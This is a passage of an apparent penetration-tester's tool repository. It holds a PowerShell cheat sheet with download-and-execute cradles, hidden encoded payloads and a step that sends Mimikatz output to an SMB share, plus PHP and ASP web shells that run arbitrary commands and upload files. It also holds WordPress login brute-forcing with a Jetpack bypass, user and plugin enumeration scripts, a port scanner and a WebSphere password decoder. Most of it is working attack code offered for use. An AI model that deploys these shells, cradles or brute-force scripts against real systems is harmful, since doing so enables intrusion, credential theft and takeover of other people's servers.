-ErrorAction SilentlyContinue 655 | Write-Host "Moving $JunkFile to $PATCHCAB" -ForegroundColor Cyan 656 | Continue 657 | } 658 | if ($JunkFile.Name -eq "patch") 659 | { 660 | Move-Item $JunkFile.FullName $PATCHCAB -Force -ErrorAction SilentlyContinue 661 | Write-Host "Moving $JunkFile to $PATCHCAB" -ForegroundColor Magenta 662 | Continue 663 | } 664 | } 665 | catch 666 | { 667 | Write-Host "Error Processing ($JunkFile.Fullname)" -ForegroundColor DarkMagenta 668 | } 669 | } 670 | -------------------------------------------------------------------------------- /port_response_time.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Usage: python port_response_time.py 4 | #Example: python 
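#   port_response_time.py 192.168.1.1 1-65535 10 3 10 port_res_time.out

"""
target_ip : IP Address to scan
port_range : Port range to scan, written start-end (both ends inclusive)
block_size : Number of ports handed to one worker process at a time
connection_timeout : Timeout the connection after N seconds
spawn_processes : Number of processes to create for scanning
output_filename : File name to save output
"""

#Author: Interference Security

import socket
import sys
from datetime import datetime
from multiprocessing import Pool

script_start = datetime.now()
if len(sys.argv) != 7:
    print "Usage: " + sys.argv[0] + " <target_ip> <port_range> <block_size> <connection_timeout> <spawn_processes> <output_filename>"
    exit(0)

target_ip = sys.argv[1]
target_port_range = sys.argv[2].split("-")
block_size = int(sys.argv[3])
con_timeout = int(sys.argv[4])
proc_count = int(sys.argv[5])
out_file = sys.argv[6]

start_port = int(target_port_range[0])
end_port = int(target_port_range[1])


def checker(t_ip, t_port_start, t_port_end):
    """Time a TCP connect to every port in [t_port_start, t_port_end] on t_ip.

    Returns one CSV line per port, "ip,port,microseconds\\n" on success or
    "ip,port,Error-<reason>\\n" when the connect/send raised, concatenated
    into a single string ("" for an empty range).  con_timeout is read from
    module scope, so the function must run inside this script's process pool.
    """
    lines = []
    for target_port in range(int(t_port_start), int(t_port_end) + 1):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(con_timeout)
        start_time = datetime.now()
        try:
            sock.connect((t_ip, int(target_port)))
            sock.send("test")
            diff_time = datetime.now() - start_time
            # whole elapsed time in microseconds; timedelta.microseconds alone
            # drops the seconds part, so anything over 1s was reported wrong
            elapsed = (diff_time.days * 86400 + diff_time.seconds) * 1000000 + diff_time.microseconds
            lines.append("%s,%s,%s" % (t_ip, target_port, elapsed))
        except Exception as e:
            lines.append("%s,%s,Error-%s" % (t_ip, target_port, e))
        finally:
            # every socket is closed, also on timeout/refused, so a 65535-port
            # run does not exhaust descriptors
            sock.close()
    if not lines:
        return ""
    return "\n".join(lines) + "\n"


pool = Pool(processes=proc_count)
results = []
# end_port + 1: with the original range(start, end, block) a range whose length
# was an exact multiple of block_size never scanned its last port
for sp in range(start_port, end_port + 1, block_size):
    ep = min(sp + block_size - 1, end_port)
    results.append(pool.apply_async(checker, args=(target_ip, sp, ep)))
pool.close()

f = open(out_file, "w")
try:
    for p in results:
        data = p.get()
        f.write(data)
        print data
finally:
    f.close()
pool.join()

script_end = datetime.now()
print "Total time: " + str(script_end - script_start)
-------------------------------------------------------------------------------- /ps-cmd.txt: -------------------------------------------------------------------------------- 1 | IEX (New-Object Net.WebClient).DownloadString("http:///full_path/script_name.ps1") 2 | 3 | powershell -ExecutionPolicy Bypass file.ps1 4 | 5 | . 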
.\file.ps1 6 | 7 | powershell.exe -NoP -sta -NonI -W Hidden -Enc ENCODED_BASE64_PAYLOAD 8 | 9 | String to Bytes to Base64: 10 | [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('IEX (New-Object Net.WebClient).DownloadString("http://127.0.0.1:8000/")')) 11 | 12 | Run a domain command from a non-domain computer: 13 | runas /netonly /user:\ powershell.exe 14 | 15 | Execute ShellCode Via InstallUtil x86: https://gist.github.com/interference-security/117dd7a820380b0af13b9ecb8f21ff0c (Dead link: https://gist.github.com/subTee/408d980d88515a539672) 16 | Execute ShellCode Via InstallUtil x64: Looking for a trusted fork (Dead link: https://gist.github.com/subTee/a06d4ae23e2517566c52) 17 | https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md 18 | 19 | Mimikatz in JS: https://gist.github.com/interference-security/276c4b0e9ed53a82b5c4958b4a708023 (Dead link: https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f) 20 | 21 | SMB Shares on a list of IPs: 22 | $UserName = "Domain_here\Username_here" ; $sec_password = "password_here" ; $Credentials = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $sec_password ; get-content .\ip.txt | foreach-object { Write-Host "[*] $_" ; Get-WmiObject -class win32_share -credential $Credentials -ComputerName $_ } 23 | 24 | SMB Shares on a single IP: 25 | $UserName = "USERNAME_HERE" ; $sec_password = "PASSWORD_HERE" ; $Credentials = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $sec_password ; Get-WmiObject -class win32_share -credential $Credentials -ComputerName "YOUR_IP_HERE" 26 | 27 | Powershell remote session: 28 | Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force 29 | $cred=Get-Credential "$env:USERDOMAIN\$env:USERNAME" 30 | Enter-PSSession -ComputerName 192.168.1.2 -Credential $cred 31 | 32 | Powershell output to SMB share: 33 | #script content here 34 | $A = function_name_for_above_script_here 
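#example: invoke-mimikatz 35 | Out-File -FilePath \\IP_ADDR_HERE\guest_writable_smb_share_name_here\output_filename_here.txt -InputObject $A -Encoding ASCII 36 | 37 | Powershell Get-ADUser Input File and List: 38 | $users = Get-Content "C:\temp\user_list.txt" 39 | $users = "Fname1 Lname1","Fname2 Lname2","Fname3 Lname3" 40 | $out = Foreach ($user in $users) { Get-ADuser -Filter { displayname -eq $user } -Properties * | select name,mail,samaccountname }; $out | out-gridview 41 | -------------------------------------------------------------------------------- /quick-one-liners.md: -------------------------------------------------------------------------------- 1 | # Quick One Liners 2 | -------------------------------------------------------------------------------- /shodan_ip_port_info.py: -------------------------------------------------------------------------------- 
#!/usr/bin/python

#Usage: python shodan_ip_port_info.py <ip_list_file> <output_file>
#Example: python shodan_ip_port_info.py ip_list.lst output.out

#Note: As on 27-02-2016 this command "shodan host <ip>" does not use Shodan API and does not consume your credits

#Author: Interference Security

import sys
from subprocess import check_output, CalledProcessError

if len(sys.argv) != 3:
    print "Usage: python shodan_ip_port_info.py <ip_list_file> <output_file>"
    sys.exit(1)

# Read the whole list first so the input file is closed before the slow lookups start.
with open(sys.argv[1], "r") as ip_file:
    ip_addrs = [line.strip() for line in ip_file]

# One open of the output file for the whole run (the original reopened it per address).
with open(sys.argv[2], "a") as out_file:
    for ipaddr in ip_addrs:
        if not ipaddr:
            continue
        try:
            # argument list, no shell: the address is never interpreted by a shell
            out = check_output(["shodan", "host", ipaddr])
        except (CalledProcessError, OSError) as e:
            # a failed lookup is reported instead of silently dropped, then the run continues
            print "[!] %s: %s" % (ipaddr, e)
            continue
        out_file.write(out)
        out_file.write("\n")
        print out
-------------------------------------------------------------------------------- /simple-https-server.py: -------------------------------------------------------------------------------- 
#openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
import BaseHTTPServer, SimpleHTTPServer, logging
import ssl
import sys
import cgi


class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Static file server that prints every request before serving it.

    GET prints the request line and headers; POST and PUT additionally print
    the request body, then fall through to the normal GET file handling.
    """

    def log_request_details(self, body=None):
        """Print request line and headers, plus the body when one was read."""
        print "\n----- Request Start ----->"
        print self.raw_requestline
        print self.headers
        print "<----- Request End ----->"
        if body is not None:
            print "<----- Request Body Start ----->"
            print body
            print "<----- Request Body End ----->"

    def do_GET(self):
        self.log_request_details()
        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

    def do_POST(self):
        # Read exactly Content-Length bytes.  rfile.readlines() blocked until the
        # client closed the connection, which keep-alive clients never do.
        try:
            length = int(self.headers.getheader('Content-Length') or 0)
        except ValueError:
            length = 0
        body = self.rfile.read(length) if length > 0 else ""
        self.log_request_details(body)
        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

    do_PUT = do_POST


if len(sys.argv) != 3:
    print "Usage: python simple-https-server.py <listen_ip> <listen_port>"
    sys.exit(1)

listen_ip = sys.argv[1]
listen_port = int(sys.argv[2])
httpd = BaseHTTPServer.HTTPServer((listen_ip, listen_port), GetHandler)
print "[*] Listening on %s on port %s" % (listen_ip, listen_port)
# NOTE(review): wrap_socket with no ssl_version lets the interpreter's default
# protocol set be negotiated; pin a TLS-only version on builds that support it.
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem', server_side=True)
try:
    httpd.serve_forever()
except KeyboardInterrupt:
    httpd.server_close()
-------------------------------------------------------------------------------- /web_capture.py: -------------------------------------------------------------------------------- 
#!/usr/bin/env python

# Takes screenshot of a web page using selenium

# Usage 1:
# File containing line separated URLs:
# python web_capture.py url_file.txt

# Usage 2:
# List of URLs hardcoded in "urls = []"
# Example: urls = ["http://127.0.0.1","https://127.0.0.1"]

# one line code
# python -c "from selenium import webdriver; driver = webdriver.Firefox(); driver.get('http://127.0.0.1'); driver.save_screenshot('capture.png'); driver.quit()"

import sys
try:
    from selenium import webdriver
except ImportError:
    print "[!] You should have selenium installed. Run: pip install selenium"
    sys.exit(1)

urls = []
if len(sys.argv) >= 2:
    # A URL file replaces the hardcoded list; blank lines are skipped so
    # driver.get("") is never attempted.
    with open(sys.argv[1], "r") as url_file:
        urls = [line.strip() for line in url_file if line.strip()]

#https://github.com/ariya/phantomjs
#driver = webdriver.PhantomJS("/path/to/phantomjs/binary/file")

#https://sites.google.com/a/chromium.org/chromedriver/downloads
#driver = webdriver.Chrome("/path/to/chromedriver/binary/file")

driver = webdriver.Firefox()
try:
    # the screenshot index follows the URL's position in the list, failed or not
    for count, myurl in enumerate(urls):
        try:
            driver.get(myurl)
            driver.save_screenshot(str(count) + '.png')
        except Exception as e:
            # one unreachable URL must not abort the whole batch
            print "[!] %s: %s" % (myurl, e)
finally:
    # always release the browser, also when a URL raised
    driver.quit()
-------------------------------------------------------------------------------- /webshell/mysql-cmd-upload.php: -------------------------------------------------------------------------------- 1 | 11 | 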
12 |
13 | Execute SQL Queries: 14 | 15 |

16 | 17 | 18 | 19 |

20 | 21 | 22 | 23 |

24 | 25 | 26 | 27 |
28 |
29 |
30 |
31 | Execute OS Commands: 32 | 33 |

34 | 35 | 36 | 37 |
38 |
39 |
40 |
41 | Upload File: 42 | 43 |

44 | 45 | "/> 46 | 47 | 48 | 49 |
50 |
51 | SQL Query: ".htmlentities($squery)."

"; 69 | $conn = new mysqli($servername, $dbuname, $dbpass, $dbname); 70 | // Check connection 71 | if ($conn->connect_error) 72 | { 73 | die("Connection failed: " . $conn->connect_error); 74 | } 75 | 76 | $result = $conn->query($squery); 77 | 78 | if ($result->num_rows > 0) 79 | { 80 | $start = 0; 81 | // output data of each row 82 | echo ''; 83 | while($row = $result->fetch_assoc()) 84 | { 85 | if($start==0) 86 | { 87 | $col_names = array_keys($row); 88 | echo ""; 89 | foreach($col_names as $col) 90 | { 91 | echo ""; 92 | } 93 | echo ""; 94 | $start++; 95 | } 96 | //echo "
";
 97 | 					//print_r($row);
 98 | 					//echo "
"; 99 | echo ""; 100 | foreach($row as $val) 101 | { 102 | echo ""; 103 | } 104 | echo ""; 105 | } 106 | echo '
$col
$val
'; 107 | } 108 | else 109 | { 110 | echo "0 results"; 111 | } 112 | $conn->close(); 113 | } 114 | elseif(isset($_POST['cmd']))//For command execution 115 | { 116 | echo "Command: ".htmlentities($_POST['cmd'])."

"; 117 | echo "Output:
"; 118 | echo "
";
119 | 			highlight_string(shell_exec($_POST['cmd']));
120 | 			echo "
"; 121 | } 122 | elseif(isset($_FILES['myfile']) && isset($_POST['tpath'])) 123 | { 124 | $target_path = $_POST['tpath']; 125 | $target_path = $target_path.basename($_FILES['myfile']['name']); 126 | echo "File Upload: "; 127 | if(move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) 128 | { 129 | echo "The file ".htmlentities(basename($_FILES['myfile']['name']))." has been uploaded"; 130 | } 131 | else 132 | { 133 | echo "There was an error uploading the file, please try again!"; 134 | } 135 | echo ""; 136 | } 137 | else 138 | { 139 | 140 | } 141 | } 142 | } 143 | ?> 144 | -------------------------------------------------------------------------------- /webshell/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Server.ScriptTimeout = 180 3 | Dim wshell, intReturn, strPResult, objCmd, cmd 4 | if Request.Form("submit") <> "" then 5 | cmd = Request.Form("cmd") 6 | Response.Write("Running command: " & cmd & "
") 7 | wshell = CreateObject("WScript.Shell") 8 | objCmd = wShell.Exec(cmd) 9 | strPResult = objCmd.StdOut.Readall() 10 | response.write("
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
") 11 | wshell = nothing 12 | end if 13 | 14 | %> 15 | 16 | 17 | 18 |
19 | Command:
20 | 21 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 22 |

Example command to do a directory listing:
23 | %ComSpec% /c dir 24 |

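25 | 26 | 27 | -------------------------------------------------------------------------------- /webshell/shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /websphere-xor-password-decode-encode.py: -------------------------------------------------------------------------------- 
# Decode and Encode WebSphere XOR Password
# Base code from: https://gist.github.com/metall0id/bb3e9bab2b7caee90cb7

import base64
import argparse
import sys

# WebSphere's {xor} form XORs every byte with this single fixed byte before base64.
XOR_KEY = '_'
XOR_PREFIX = '{xor}'


def xor_with_key(data):
    """Return data with every character XORed against XOR_KEY.

    The operation is its own inverse, so the same function both encodes and
    decodes.  data is a byte string (Python 2 str); the result has the same
    length.
    """
    return "".join(chr(ord(character) ^ ord(XOR_KEY)) for character in data)


parser = argparse.ArgumentParser(description="WebSpere XOR Password Decoder/Encoder")
parser.add_argument('-e', '--encode', help='Encode password', action='store_true')
parser.add_argument('-d', '--decode', help='Decode password', action='store_true')
parser.add_argument('password', help='Password to decode/encode')
args = parser.parse_args()

if not args.password:
    parser.print_help()
    sys.exit(1)

print ""
if args.encode:
    encoded = base64.b64encode(xor_with_key(args.password))
    print "Decoded Password: " + args.password
    print "Encoded Password: " + XOR_PREFIX + encoded
elif args.decode:
    encoded = args.password
    if encoded.startswith(XOR_PREFIX):
        # strip only the leading marker, not every occurrence in the string
        encoded = encoded[len(XOR_PREFIX):]
    try:
        decoded = xor_with_key(base64.b64decode(encoded))
    except (TypeError, ValueError) as e:
        # malformed base64 (bad padding / characters) is the only expected failure here
        print "Exception: " + str(e)
        sys.exit(1)
    print "Encoded Password: " + XOR_PREFIX + encoded
    print "Decoded Password: " + decoded
else:
    # was parse.print_help(): a NameError whenever neither -e nor -d was given
    parser.print_help()
-------------------------------------------------------------------------------- /windows-bins/calc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/windows-bins/calc.exe -------------------------------------------------------------------------------- /windows-bins/cmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/windows-bins/cmd.exe -------------------------------------------------------------------------------- /windows-bins/readme.md: -------------------------------------------------------------------------------- 1 | # Windows Binaries 2 | -------------------------------------------------------------------------------- /wordpress/wp_full_path_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Python script to perform WordPress FPD check 4 | #Tested on: 5 | #Windows,Linux 6 | #WordPress v4.2.2 7 | 8 | try: 9 | from bs4 import BeautifulSoup 10 | import urllib2 11 | import requests 12 | import argparse 13 | import ssl 14 | except Exception,e: 15 | print "[!] 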
Error: "+str(e) 16 | print "[*] Make sure you have the following Python modules installed:\n\tbs4, urllib2, requests, argparse, ssl, lxml" 17 | exit(0) 18 | 19 | parser = argparse.ArgumentParser(description='Check for WordPress Full Path Disclosure vulnerability') 20 | parser.add_argument('-t','--target', help='WordPress target', required=True) 21 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 22 | parser.add_argument('-o','--outfile', help='Save output in file') 23 | args = parser.parse_args() 24 | target = args.target.encode('utf-8') 25 | 26 | if target.endswith("/"): 27 | target = target[:-1] 28 | 29 | if hasattr(ssl, '_create_unverified_context'): 30 | ssl._create_default_https_context = ssl._create_unverified_context 31 | 32 | def checker(base_path, target_paths): 33 | for i in target_paths: 34 | try: 35 | target_url = target+base_path+str(i) 36 | if args.verbose: 37 | print "[-] Trying: "+target_url 38 | r = requests.get(target_url, verify=False) 39 | sc = r.status_code 40 | if sc != 404 and sc != 500 and sc != 403: 41 | html = urllib2.urlopen(target_url) 42 | soup = BeautifulSoup(html.read(), "lxml") 43 | allb = soup.find_all("b") 44 | #print allb[1] 45 | try: 46 | res = (str(allb[1]).replace("","")).replace("","") 47 | print "[*] Found: " + str(target_url) + " : " + str(res) 48 | if args.outfile: 49 | f = open(args.outfile, "a") 50 | f.write("[*] Found: " + str(target_url) + " : " + str(res) + "\n") 51 | f.close() 52 | except Exception,e: 53 | #print str(e) 54 | pass 55 | except Exception,e: 56 | #print "Exception occurred" 57 | print str(e) 58 | 59 | print "[*] Started" 60 | requests.packages.urllib3.disable_warnings() 61 | #wp-includes check 62 | print "[*] Checking in 'wp-includes' directory" 63 | wp_includes_path = "/wp-includes/" 64 | target_paths=["admin-bar.php", "atomlib.php", "author-template.php", "bookmark-template.php", "bookmark.php", "cache.php", "canonical.php", "capabilities.php", 
"category-template.php", "category.php", "class-IXR.php", "class-feed.php", "class-http.php", "class-json.php", "class-oembed.php", "class-phpass.php", "class-phpmailer.php", "class-pop3.php", "class-simplepie.php", "class-smtp.php", "class-snoopy.php", "class-wp-admin-bar.php", "class-wp-ajax-response.php", "class-wp-customize-control.php", "class-wp-customize-manager.php", "class-wp-customize-panel.php", "class-wp-customize-section.php", "class-wp-customize-setting.php", "class-wp-customize-widgets.php", "class-wp-editor.php", "class-wp-embed.php", "class-wp-error.php", "class-wp-http-ixr-client.php", "class-wp-image-editor-gd.php", "class-wp-image-editor-imagick.php", "class-wp-image-editor.php", "class-wp-theme.php", "class-wp-walker.php", "class-wp-xmlrpc-server.php", "class-wp.php", "class.wp-dependencies.php", "class.wp-scripts.php", "class.wp-styles.php", "comment-template.php", "comment.php", "compat.php", "cron.php", "date.php", "default-constants.php", "default-filters.php", "default-widgets.php", "deprecated.php", "feed-atom-comments.php", "feed-atom.php", "feed-rdf.php", "feed-rss.php", "feed-rss2-comments.php", "feed-rss2.php", "feed.php", "files.txt", "formatting.php", "functions.php", "functions.wp-scripts.php", "functions.wp-styles.php", "general-template.php", "http.php", "kses.php", "l10n.php", "link-template.php", "load.php", "locale.php", "media-template.php", "media.php", "meta.php", "ms-blogs.php", "ms-default-constants.php", "ms-default-filters.php", "ms-deprecated.php", "ms-files.php", "ms-functions.php", "ms-load.php", "ms-settings.php", "nav-menu-template.php", "nav-menu.php", "option.php", "pluggable-deprecated.php", "pluggable.php", "plugin.php", "post-formats.php", "post-template.php", "post-thumbnail-template.php", "post.php", "query.php", "registration-functions.php", "registration.php", "revision.php", "rewrite.php", "rss-functions.php", "rss.php", "script-loader.php", "session.php", "shortcodes.php", "taxonomy.php", 
"template-loader.php", "template.php", "theme.php", "update.php", "user.php", "vars.php", "version.php", "widgets.php", "wp-db.php", "wp-diff.php"] 65 | checker(wp_includes_path, target_paths) 66 | #wp-admin check 67 | print "[*] Checking in 'wp-admin' directory" 68 | wp_admin_path = "/wp-admin/" 69 | target_paths=["about.php", "admin-ajax.php", "admin-footer.php", "admin-functions.php", "admin-header.php", "admin-post.php", "admin.php", "async-upload.php", "comment.php", "credits.php", "custom-background.php", "custom-header.php", "customize.php", "edit-comments.php", "edit-form-advanced.php", "edit-form-comment.php", "edit-link-form.php", "edit-tag-form.php", "edit-tags.php", "edit.php", "export.php", "freedoms.php", "import.php", "index.php", "install-helper.php", "install.php", "link-add.php", "link-manager.php", "link-parse-opml.php", "link.php", "load-scripts.php", "load-styles.php", "media-new.php", "media-upload.php", "media.php", "menu-header.php", "menu.php", "moderation.php", "ms-admin.php", "ms-delete-site.php", "ms-edit.php", "ms-options.php", "ms-sites.php", "ms-themes.php", "ms-upgrade-network.php", "ms-users.php", "my-sites.php", "nav-menus.php", "network.php", "options-discussion.php", "options-general.php", "options-head.php", "options-media.php", "options-permalink.php", "options-reading.php", "options-writing.php", "options.php", "plugin-editor.php", "plugin-install.php", "plugins.php", "post-new.php", "post.php", "press-this.php", "profile.php", "revision.php", "setup-config.php", "theme-editor.php", "theme-install.php", "themes.php", "tools.php", "update-core.php", "update.php", "upgrade-functions.php", "upgrade.php", "upload.php", "user-edit.php", "user-new.php", "users.php", "widgets.php"] 70 | checker(wp_admin_path, target_paths) 71 | print "[*] Completed" 72 | -------------------------------------------------------------------------------- /wordpress/wp_login_attack_jetpack.py: 
-------------------------------------------------------------------------------- 1 | try: 2 | import mechanize 3 | #import cookielib 4 | import re 5 | import argparse 6 | import warnings 7 | except Exception,e: 8 | print "[!] Error: "+str(e) 9 | print "[*] Make sure you have the following Python modules installed:\n\tmechanize, re, argparse, warning" 10 | exit(0) 11 | 12 | warnings.filterwarnings("ignore") 13 | 14 | parser = argparse.ArgumentParser(description="WordPress login page attack. Supports 'Jetpack' plugin protection bypass.\n") 15 | parser.add_argument('-t','--target', help='WordPress target', required=True) 16 | parser.add_argument('-u','--user', help='WordPress username to attack', required=True) 17 | parser.add_argument('-p','--plist', help='File containing passwords', required=True) 18 | parser.add_argument('-x','--proxy', help='HTTP/HTTPS proxy setting (ip_address:port)') 19 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 20 | args = parser.parse_args() 21 | 22 | target = args.target.encode('utf-8') 23 | wp_username = args.user.encode('utf-8') 24 | pass_file = args.plist.encode('utf-8') 25 | wp_jetpack_protect_num = "" 26 | 27 | if target.endswith("/"): 28 | target = target[:-1] 29 | 30 | target = target+"/wp-login.php" 31 | 32 | f = open(pass_file, "r") 33 | pass_list = f.readlines() 34 | 35 | for wp_password in pass_list: 36 | try: 37 | wp_password = (wp_password.replace("\r", "")).replace("\n", "") 38 | # Browser 39 | br = mechanize.Browser() 40 | 41 | #Set proxy 42 | if args.proxy: 43 | br.set_proxies({"http": args.proxy, "https": args.proxy}) 44 | 45 | # Cookie Jar 46 | #cj = cookielib.LWPCookieJar() 47 | #br.set_cookiejar(cj) 48 | 49 | # Browser options 50 | br.set_handle_equiv(True) 51 | br.set_handle_gzip(True) 52 | br.set_handle_redirect(True) 53 | br.set_handle_referer(True) 54 | br.set_handle_robots(False) 55 | 56 | # User-Agent (this is cheating, ok?) 
57 | br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 58 | 59 | r = br.open(target) 60 | 61 | lines = str(br.response().read()) 62 | 63 | #print "[*] HTML source of the target URL: " + target + "\n" + lines 64 | 65 | if "jetpack_protect_num" in lines: 66 | # lines = '5   +   10   =  ' 67 | searchObj = re.search( '(\d{1,}) \ \; \+ \ \; (\d{1,}) \ \; \= \ \;', lines, re.M|re.I) 68 | if searchObj: 69 | if args.verbose: 70 | print "[+] Jetpack Pattern : ", searchObj.group() 71 | print "\t[-] Jetpack 1st digit : ", searchObj.group(1) 72 | print "\t[-] jetpack 2nd digit : ", searchObj.group(2) 73 | wp_jetpack_protect_num = str(int(searchObj.group(1)) + int(searchObj.group(2))) 74 | else: 75 | if args.verbose: 76 | print "[!] Jetpack pattern not found" 77 | 78 | # Show the available forms 79 | #if args.verbose: 80 | # for f in br.forms(): 81 | # print f 82 | 83 | # Select the first (index zero) form 84 | br.select_form(nr=0) 85 | 86 | br.form['log'] = wp_username 87 | br.form['pwd'] = wp_password 88 | if len(wp_jetpack_protect_num)>=1: 89 | br.form['jetpack_protect_num'] = wp_jetpack_protect_num 90 | if args.verbose: 91 | print "[-] Trying: " + wp_username + " : " + wp_password 92 | br.submit() 93 | #print br.response().read() 94 | if "Log Out" in br.response().read(): 95 | print "[*] Found: " + wp_username + " : " + wp_password 96 | except Exception,e: 97 | print "Exception occurred" + str(e) 98 | -------------------------------------------------------------------------------- /wordpress/wp_login_user_enumeration.py: -------------------------------------------------------------------------------- 1 | #Python script for user enumeration from WordPress login page 2 | #It works even if plugins like "Unified Login Error Messages" is installed 3 | 4 | try: 5 | import requests 6 | import sys 7 | import argparse 8 | import ssl 9 | except Exception,e: 10 | print "[!] 
Error: "+str(e) 11 | print "[*] Make sure you have the following Python modules installed:\n\trequests, argparse, ssl" 12 | exit(0) 13 | 14 | parser = argparse.ArgumentParser(description="WordPress login page user enumeration. Supports 'Unified Login Error Messages' plugin bypass. Technique Reference:\nT1 = Check for 'value=\"\"'\nT2 = Check for \"document.getElementById('user_pass')\"\n") 15 | parser.add_argument('-t','--target', help='WordPress target', required=True) 16 | parser.add_argument('-u','--users', help='File containing usernames', required=True) 17 | parser.add_argument('-o','--outfile', help='Save output in file') 18 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 19 | args = parser.parse_args() 20 | target = args.target.encode('utf-8') 21 | user_file = args.users.encode('utf-8') 22 | 23 | f = open(user_file, "r") 24 | user_list = f.readlines() 25 | 26 | #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080",} 27 | cookies = dict(wordpress_test_cookie='WP Cookie Check') 28 | 29 | if hasattr(ssl, '_create_unverified_context'): 30 | ssl._create_default_https_context = ssl._create_unverified_context 31 | 32 | try: 33 | requests.packages.urllib3.disable_warnings() 34 | except: 35 | pass 36 | 37 | for user in user_list: 38 | try: 39 | user = (user.replace("\r", "")).replace("\n", "") 40 | if args.verbose: 41 | print "[-] Trying: " + user 42 | post_data = {"log":user, "pwd":"AnyInvalidPass", "wp-submit":"Log In", "redirect_to":target+"/wp-admin/", "testcookie":"1"} 43 | #r = requests.post(target+"/wp-login.php", data=post_data, proxies=proxies, cookies=cookies, verify=False) 44 | r = requests.post(target+"/wp-login.php", data=post_data, cookies=cookies, verify=False) 45 | sc = r.text 46 | #print sc 47 | check1 = 'value="'+user+'"' 48 | check2 = "document.getElementById('user_pass')"; 49 | #print check1 50 | #print check2 51 | #print int(sc.find(check1)) 52 | if 
int(sc.find(check1)) > -1: 53 | print "[T1] Valid user: "+user 54 | if args.outfile: 55 | f = open(args.outfile, "a") 56 | f.write("[T1] Valid user: "+user+"\n") 57 | f.close() 58 | else: 59 | if int(sc.find(check2)) > -1: 60 | print "[T2] Valid user: "+user 61 | if args.outfile: 62 | f = open(args.outfile, "a") 63 | f.write("[T2] Valid user: "+user+"\n") 64 | f.close() 65 | except Exception,e: 66 | print "Exception occurred" 67 | -------------------------------------------------------------------------------- /wordpress/wp_plugin_enum.py: -------------------------------------------------------------------------------- 1 | try: 2 | import requests 3 | import argparse 4 | import ssl 5 | except Exception,e: 6 | print "[!] Error: "+str(e) 7 | print "[*] Make sure you have the following Python modules installed:\n\trequests, argparse, ssl" 8 | exit(0) 9 | 10 | parser = argparse.ArgumentParser(description="WordPress plugin enumeration") 11 | parser.add_argument('-t','--target', help='WordPress target', required=True) 12 | parser.add_argument('-p','--plugins', help='File containing plugin names', required=True) 13 | parser.add_argument('-o','--outfile', help='Save output in file') 14 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 15 | args = parser.parse_args() 16 | target = args.target.encode('utf-8') 17 | plugin_file = args.plugins.encode('utf-8') 18 | 19 | if target.endswith("/"): 20 | target = target[:-1] 21 | 22 | if hasattr(ssl, '_create_unverified_context'): 23 | ssl._create_default_https_context = ssl._create_unverified_context 24 | 25 | print "[*] Started" 26 | 27 | try: 28 | requests.packages.urllib3.disable_warnings() 29 | except: 30 | pass 31 | 32 | f = open(plugin_file, "r") 33 | data = f.readlines() 34 | 35 | print "\nNote: Append readme.txt or changelog.txt in same or different letter cases to open version file\n" 36 | 37 | for i in data: 38 | try: 39 | i = (i.replace("\r","")).replace("\n","") 40 | 
if args.verbose: 41 | print "[-] Trying: " + i 42 | r = requests.get(target+"/wp-content/plugins/"+i+"/", verify=False, allow_redirects=False) 43 | sc = r.status_code 44 | if sc != 404 and sc != 500 and sc != 403 and sc != 301 and sc != 302: 45 | print i + " : " + str(sc) + " : " + target + "/wp-content/plugins/" + i + "/" 46 | if args.outfile: 47 | f = open(args.outfile, "a") 48 | f.write(i + " : " + str(sc) + " : " + target + "/wp-content/plugins/" + i + "/" + "\n") 49 | f.close() 50 | except Exception,e: 51 | print "Exception occurred" 52 | print "[*] Completed" 53 | -------------------------------------------------------------------------------- /wordpress/wp_user_enumeration_with_plugin_bypass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Python script to perform WordPress user enumeration even if "Stop User Enumeration" plug-in is installed 4 | #Tested on: 5 | #Windows,Linux 6 | #WordPress v4.2.2 7 | #Stop User Enumeration v1.3.1 8 | 9 | try: 10 | from bs4 import BeautifulSoup 11 | import urllib2 12 | import requests 13 | import sys 14 | import argparse 15 | import ssl 16 | except Exception,e: 17 | print "[!] 
